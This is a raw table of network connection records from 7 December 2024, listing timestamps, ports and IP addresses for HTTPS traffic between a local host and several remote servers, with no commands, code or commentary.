Dec 7, 2024 10:51:23.841319084 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.841466904 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.841474056 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.847366095 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.847409010 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.847417116 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.853584051 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.853765965 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.853771925 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.854118109 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.854175091 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.854185104 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.854193926 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:24.010014057 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.010039091 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.010107040 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.010148048 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.010257959 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.059192896 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.059214115 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.059266090 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.059292078 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.059331894 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.059341908 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.177351952 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.177378893 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.177436113 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.177467108 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.177484035 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.177508116 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.208463907 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.208482981 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.208569050 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.208580971 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.208643913 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.230607986 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.230633020 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.230689049 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.230703115 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.230746031 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.230758905 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.251576900 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.251594067 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.251669884 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.251683950 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.251729965 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.363080978 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.363131046 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.363161087 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.363187075 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.363202095 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.363224983 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.379581928 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.379601002 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.379677057 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.379693985 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.379779100 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.394330978 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.394350052 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.394418001 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.394435883 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.394479036 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.407265902 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.407285929 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.407351971 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.407363892 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.407402039 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.422022104 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.422039032 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.422107935 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.422116995 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.422152042 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.435928106 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.435945988 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.436013937 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.436022997 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.436151028 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.548968077 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.548990965 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.549067974 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.549089909 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.549139977 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.559931993 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.559948921 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.560019970 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.560030937 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.560069084 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.569561958 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.569580078 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.569643021 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.569657087 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.569891930 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.580156088 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.580172062 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.580239058 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.580252886 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.580300093 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.590671062 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.590687037 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.590759993 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.590783119 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.590835094 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.600613117 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.600630999 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.600720882 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.600740910 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.602852106 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.611135960 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.611150980 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.611193895 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.611203909 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.611243963 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.621699095 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.621716022 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.621762037 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.621773005 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.621818066 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.731878996 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:24.731920004 CET	443	49750	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:24.732069016 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:24.732361078 CET	49750	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:24.732377052 CET	443	49750	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:24.743133068 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.743158102 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.743258953 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.743258953 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.743279934 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.743534088 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.751703024 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.751719952 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.751796961 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.751806021 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.751874924 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.760086060 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.760102034 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.760159969 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.760169029 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.760418892 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.768559933 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.768580914 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.768634081 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.768646002 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.768682957 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.768696070 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.775944948 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.775964975 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.776006937 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.776016951 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.776045084 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.776067019 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.783763885 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.783780098 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.783835888 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.783844948 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.783914089 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.792213917 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.792228937 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.792263985 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.792310953 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.792316914 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.792433977 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.800602913 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.800620079 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.800681114 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.800689936 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.800728083 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.936104059 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.936139107 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.936199903 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.936237097 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.936268091 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.936278105 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.943137884 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.943155050 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.943242073 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.943257093 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.946074963 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.951237917 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.951265097 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.951334000 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.951342106 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.951364994 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.951386929 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.957041979 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.957082033 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.957114935 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.957123041 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.957140923 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:24.957160950 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.957176924 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.958147049 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:24.958161116 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.037553072 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.037633896 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.038130045 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.038136959 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.038356066 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.038361073 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.275154114 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.276212931 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.276247978 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.276273012 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.276920080 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.276926041 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.277981997 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.277997017 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.278179884 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.278567076 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.278572083 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.278584957 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.279211998 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.279243946 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.279850960 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.279865980 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.279951096 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.279973030 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.280498981 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.280507088 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.319878101 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.321777105 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.321815968 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.322237015 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.322242975 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.519296885 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.519332886 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.519349098 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.519359112 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.519370079 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.519392967 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.519452095 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.641555071 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:25.641571999 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:25.641763926 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:25.644150972 CET	49753	443	192.168.2.6	23.218.208.109
Dec 7, 2024 10:51:25.644164085 CET	443	49753	23.218.208.109	192.168.2.6
Dec 7, 2024 10:51:25.697935104 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.697963953 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.698077917 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.698091984 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.698148966 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.709729910 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.709798098 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.709878922 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.710133076 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.710133076 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.710155964 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.710165024 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.710750103 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.710824013 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.710901022 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.711052895 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.711052895 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.711061001 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.711067915 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.712481022 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.712544918 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.712615967 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713197947 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713198900 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713217974 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.713228941 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.713291883 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.713360071 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.713438988 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713442087 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713480949 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.713515043 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713556051 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713562965 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.713613987 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713943958 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713958025 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.713973045 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.713979006 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.714715958 CET	49754	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.714730978 CET	443	49754	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.715651035 CET	49755	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.715682983 CET	443	49755	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.716111898 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.716134071 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.716187954 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.716610909 CET	49756	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.716624975 CET	443	49756	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.717892885 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.717927933 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.717984915 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.718086004 CET	49757	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.718101978 CET	443	49757	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.744489908 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.744510889 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.744584084 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.744606972 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.744653940 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.755723953 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.755799055 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.755929947 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.755992889 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.756009102 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.756022930 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.756028891 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.758327007 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.758359909 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.758610010 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.758745909 CET	49758	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:25.758763075 CET	443	49758	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:25.827970028 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:25.828011036 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:25.828135014 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:25.829319954 CET	49759	443	192.168.2.6	4.245.163.56
Dec 7, 2024 10:51:25.829335928 CET	443	49759	4.245.163.56	192.168.2.6
Dec 7, 2024 10:51:25.868685007 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.868709087 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.868779898 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.868810892 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.868829012 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.868854046 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.896718025 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.896742105 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.896800995 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.896811008 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.896858931 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.921675920 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.921695948 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.921757936 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.921768904 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.921811104 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.921829939 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.938534021 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.938553095 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.938626051 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:25.938637018 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:25.938682079 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.056032896 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.056073904 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.056127071 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.056150913 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.056179047 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.056205034 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:26.071621895 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:26.071643114 CET	443	49740	150.171.27.10	192.168.2.6
